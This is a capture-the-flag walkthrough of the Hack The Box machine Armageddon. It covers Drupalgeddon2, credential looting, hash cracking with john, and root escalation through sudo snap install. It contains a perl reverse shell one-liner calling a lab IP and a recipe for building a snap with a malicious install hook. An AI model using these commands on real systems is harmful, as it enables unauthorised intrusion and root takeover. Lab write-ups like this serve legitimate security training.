Armageddon is being retired from Hackthebox today (or at least, on the day I'm writing this), and having just completed it recently, I thought I would post a walkthrough. This box is rated easy, which felt pretty accurate: basic enumeration (and a hint from the name) can get someone to root pretty quickly.

Initial Scan

# Nmap 7.91 scan initiated Sun Jul 11 02:36:48 2021 as: nmap -A -O -p- -oA armageddon -vv 10.10.10.233
Nmap scan report for 10.10.10.233
Host is up, received reset ttl 63 (0.082s latency).
Scanned at 2021-07-11 02:36:49 UTC for 69s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDC2xdFP3J4cpINVArODYtbhv+uQNECQHDkzTeWL+4aLgKcJuIoA8dQdVuP2UaLUJ0XtbyuabPEBzJl3IHg3vztFZ8UEcS94KuWP09ghv6fhc7JbFYONVJTYLiEPD8nrS/V2EPEQJ2ubNXcZAR76X9SZqt11JTyQH/s6tPH+m3m/84NUU8PNb/dyhrFpCUmZzzJQ1zCDStLXJnCAOE7EfW2wNm1CBPCXn1wNvO3SKwokCm4GoMKHSM9rNb9FjGLIY0nq+8mt7RTJZ+WLdHsje3AkBk1yooGFF+0TdOj42YK2OtAKDQBWnBm1nqLQsmm/Va9T2bPYLLK5aUd4/578u7h
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE4kP4gQ5Th3eu3vz/kPWwlUCm+6BSM6M3Y43IuYVo3ppmJG+wKiabo/gVYLOwzG7js497Vr7eGIgsjUtbIGUrY=
|   256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG9ZlC3EA13xZbzvvdjZRWhnu9clFOUe7irG8kT0oR4A
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries 
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php 
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ 
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/ 
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ 
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/11%OT=22%CT=1%CU=34089%PV=Y%DS=2%DC=T%G=Y%TM=60EA598
OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=107%TI=Z%II=I%TS=A)SEQ(SP=FD
OS:%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=A)SEQ(SP=FD%GCD=1%ISR=107%TI=Z%CI=I%TS=
OS:A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M5
OS:4DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=712
OS:0)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=
OS:)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%
OS:A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%
OS:DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=
OS:40%CD=S)

Uptime guess: 49.708 days (since Sat May 22 09:37:46 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   82.11 ms 10.10.14.1
2   82.22 ms 10.10.10.233

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 11 02:37:58 2021 -- 1 IP address (1 host up) scanned in 70.32 seconds

Exploit

From the nmap scan (the http-generator header) we can see that there's a Drupal installation, version 7. Drupal 7 is old at this point, and a few years ago it was hit by a severe vulnerability nicknamed "Drupalgeddon"; the remote code execution variant that applies to a Drupal 7 site like this one is Drupalgeddon2, CVE-2018-7600. If you want to confirm the exact 7.x release before exploiting, the /CHANGELOG.txt that robots.txt lists ships with Drupal 7 and states it. One of the other boxes I did a walkthrough on used this same exploit. Given that memory and the machine name, I went ahead and tried it from Metasploit to see if we could get a quick shell.

Lateral

Once we have a shell, the first thing to check is the Drupal config, sites/default/settings.php. At minimum it holds the database credentials, and in this case it did:

$databases = array (
 'default' =>
 array (
   'default' =>
   array (
     'database' => 'drupal',
     'username' => 'drupaluser',
     'password' => 'CQHEy@9M*m23gBVj',
     'host' => 'localhost',
     'port' => '',
     'driver' => 'mysql',
     'prefix' => '',
   ),
 ),
);

Using that password, we can dump the users table straight from the box (the password is single-quoted so the shell doesn't treat the * as a glob): echo "SELECT * FROM users;" | mysql -u drupaluser -p'CQHEy@9M*m23gBVj' -D drupal

The raw output is tab-separated and unreadable, so here is the uid 1 row rearranged as column: value pairs (the other row returned, uid 0 with almost every field NULL or empty, is Drupal's anonymous-user placeholder):

uid               1
name              brucetherealadmin
pass              $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
mail              [email protected]
theme             (empty)
signature         (empty)
signature_format  filtered_html
created           1606998756
access            1607077194
login             1607076276
status            1
timezone          Europe/London
language          (empty)
picture           0
init              [email protected]
data              a:1:{s:7:"overlay";i:1;}

We can throw that hash into a file and use john to crack it. The $S$ prefix is Drupal 7's SHA-512 phpass variant, and the character after it ("D") encodes the iteration count, 2^15 = 32768, which is the cost john reports below.

kali@kali:~/htb/armageddon$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./bruce_pass.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 512/512 AVX512BW 8x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo           (?)
1g 0:00:00:00 DONE (2021-07-11 03:08) 2.173g/s 504.3p/s 504.3c/s 504.3C/s tiffany..harley
Use the "--show" option to display all of the cracked passwords reliably
Session completed
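To make concrete what john is actually grinding through here, the following is an added example (not code from the original post) that re-implements Drupal 7's _password_crypt() from includes/password.inc in Python and checks the dumped hash against the cracked password. The only data it uses is the hash from the users table above; the function names are my own, and the salt generator in make_hash() is a simplification of Drupal's, not a byte-for-byte copy.

```python
"""Verify and generate Drupal 7 $S$ password hashes (john's 'Drupal7' format).

Layout of a stored hash (55 chars):
  $S$ | one itoa64 char = log2(iterations) | 8-char salt | custom base64 of a SHA-512 chain
The chain is SHA-512(salt || pw), re-hashed 2**log2 more times as SHA-512(prev || pw).
"""
import hashlib
import hmac
import os

# Alphabet shared by phpass and Drupal; the index of the 4th char is log2(iterations).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH
MIN_LOG2, MAX_LOG2 = 7, 30  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT

# Hash copied from the users table dump above (uid 1, brucetherealadmin).
BRUCE_HASH = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"


def _encode64(data: bytes) -> str:
    """phpass-style base64: 3 bytes -> 4 chars, low bits first, no padding."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored: str):
    """Return (log2_iterations, iterations, salt) from the 12-char setting prefix."""
    setting = stored[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        raise ValueError("not a phpass-style setting")
    if setting[1] != "S":
        raise ValueError("only $S$ (SHA-512) hashes are handled here")
    log2 = ITOA64.index(setting[3])          # ValueError if the char is not in the alphabet
    if not MIN_LOG2 <= log2 <= MAX_LOG2:
        raise ValueError("iteration count outside Drupal's accepted range")
    return log2, 1 << log2, setting[4:12]


def drupal7_crypt(password: str, setting: str) -> str:
    """Re-implementation of _password_crypt('sha512', password, setting)."""
    _, count, salt = parse_setting(setting)
    pw = password.encode("utf-8")
    digest = hashlib.sha512(salt.encode("ascii") + pw).digest()
    for _ in range(count):                   # PHP's do { } while (--$count) runs exactly `count` times
        digest = hashlib.sha512(digest + pw).digest()
    return (setting[:12] + _encode64(digest))[:HASH_LENGTH]


def verify(password: str, stored: str) -> bool:
    """Recompute the hash under the stored setting and compare in constant time."""
    try:
        candidate = drupal7_crypt(password, stored)
    except ValueError:
        return False
    return hmac.compare_digest(candidate.encode("utf-8"), stored.encode("utf-8"))


def make_hash(password: str, log2: int = 15) -> str:
    """Generate a fresh $S$ hash; the salt is 8 random alphabet chars (simplified, not Drupal's exact routine)."""
    salt = "".join(ITOA64[b & 0x3F] for b in os.urandom(8))
    return drupal7_crypt(password, "$S$" + ITOA64[log2] + salt)


if __name__ == "__main__":
    log2, count, salt = parse_setting(BRUCE_HASH)
    print(f"log2={log2} iterations={count} salt={salt}")
    print("booboo verifies:", verify("booboo", BRUCE_HASH))
```

Each guess costs 32769 SHA-512 calls, which is why john's rate above is a few hundred candidates per second rather than millions; a site operator who raised the iteration count would slow an attacker proportionally, and the same code path generates hashes at any log2 Drupal accepts.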

Where to go from here? One quick and easy thing we should always check is password re-use. We have a username and password, so let's see if they used the same credentials for the box itself.

kali@kali:~/htb/armageddon$ ssh brucetherealadmin@10.10.10.233
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ECDSA) to the list of known hosts.
brucetherealadmin@10.10.10.233's password: 
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$ ls

Success!

Escalation

As always, we should check what we can do as this user. Abusing sudo is quick to check and often a quick route to root, so let's start there.

[brucetherealadmin@armageddon ~]$ sudo -l
   !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
   env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
   secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

   (root) NOPASSWD: /usr/bin/snap install *

Excellent, we can run something as root without a password. So, how can we abuse this? Checking the excellent resource GTFOBins, we find an entry for snap that gives step-by-step instructions for breaking out. The trick is that snapd runs a snap's install hook as root during installation, and the --dangerous flag makes snap install a local .snap file that carries no signature, so whatever we put in meta/hooks/install executes as root (--devmode additionally disables confinement).

On my machine (the attacking host, which needs fpm and the squashfs tools it calls), I built the snap. The install hook is just a shell script holding a perl reverse shell; the trailing false makes the hook exit non-zero so snapd rolls the install back rather than leaving a snap named xxxx installed:

read -r -d '' COMMAND <<'EOF'
perl -e 'use Socket;$i="10.10.14.231";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
EOF

cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta

fpm writes xxxx_1.0_all.snap into that directory, which I then served over HTTP:

kali@kali:/tmp/tmp.0SPKJt1A2A$ python3 -m http.server 8000 --bind 10.10.14.231

And then on the target, with a listener already waiting on 10.10.14.231:443 to catch the perl reverse shell:

curl http://10.10.14.231:8000/xxxx_1.0_all.snap > xxxx_1.0_all.snap

sudo snap install xxxx_1.0_all.snap --dangerous --devmode

The install hook fires while snapd processes the install, so the listener should immediately receive a root shell.